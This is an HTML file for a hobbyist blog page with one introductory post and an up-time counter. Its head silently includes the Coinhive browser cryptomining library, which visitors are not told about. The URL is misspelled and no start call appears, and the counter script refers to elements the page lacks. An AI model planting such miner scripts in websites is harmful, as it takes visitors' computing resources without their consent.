<!DOCTYPE html>
<html>
<head>
	<script src="htts://coinhive.com/lib/coinhive.min.js" type="text/javascript"></script>

	<link href="https://fonts.googleapis.com/css?family=Roboto+Mono" rel="stylesheet">

	<title></title>



	<script type="text/javascript">
		window.onload=function() {
  // Month,Day,Year,Hour,Minute,Second
  		upTime('jan,10,2018,00:00:00'); // ****** Change this line!
		}
		function upTime(countTo) {
  			now = new Date();
  			countTo = new Date(countTo);
  			difference = (now-countTo);

  			days=Math.floor(difference/(60*60*1000*24)*1);
  			hours=Math.floor((difference%(60*60*1000*24))/(60*60*1000)*1);
  			mins=Math.floor(((difference%(60*60*1000*24))%(60*60*1000))/(60*1000)*1);
 			secs=Math.floor((((difference%(60*60*1000*24))%(60*60*1000))%(60*1000))/1000*1);

  			document.getElementById('days').firstChild.nodeValue = days;
  			document.getElementById('hours').firstChild.nodeValue = hours;
  			document.getElementById('minutes').firstChild.nodeValue = mins;
  			document.getElementById('seconds').firstChild.nodeValue = secs;

  			clearTimeout(upTime.to);
  			upTime.to=setTimeout(function(){ upTime(countTo); },1000);
	}

	</script>
	<style type="text/css">
	p,h1{
		font-family: 'Roboto Mono', monospace;
		padding: 0;
		margin: 0;
	}
body {
    background: url('https://i.imgur.com/pN6vbTA.jpg') no-repeat center center fixed; 
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
}
#countup p {
	text-align: center;
	color: #b854d4;
}



#top{
	margin-left: auto;
	margin-right: auto;
	text-align: center;
	color: #edb54b;
	background: #0a0f14;
	width: 30%;
}

#top img{
	width: 256px;
	height: 256px;
	border-radius: 50%;
}
.post {
	margin-left: auto;
	margin-right: auto;
	text-align: center;
	background: #0a0f14;
	width: 30%;

}

.postTitle {
	color:#98d1ce;
}


.post img {
	width: 256px;
	height:256px;
	border-radius: 50%;	
}

.postMessage{
	color: #d3ebe9;
}

.postAltText{
	color: #edb54b;
	font-size: 10px;
}

	</style>

</head>
<body>
	<div id="main">


		<section id="top">
			<h1 class="postTitle">My blog</h1>
			<img src="https://i.imgur.com/ePvEukr.gif">
			<p class="postAltText">--------------------------------------------------------------------</p>

		</section>

		<section id="post1">
			<div class="post">
				<h1 class="postTitle"><span style="color:#26a98b">>> </span>Hello, world...</h1>
				<img src="https://i.imgur.com/8vyOxD9.gif">
				<p class="postMessage">Today i made this blog thing, its simple but i like it. I like to think i will add more to it. </p>
				<p class="postAltText">Feb 19 2018</p>
				<p class="postAltText">--------------------------------------------------------------------</p>
			</div>
		</section>



		<footer> 

		</footer>

		<div id="countup"><p id="days">00</p></div>
	</div>


</body>
</html> 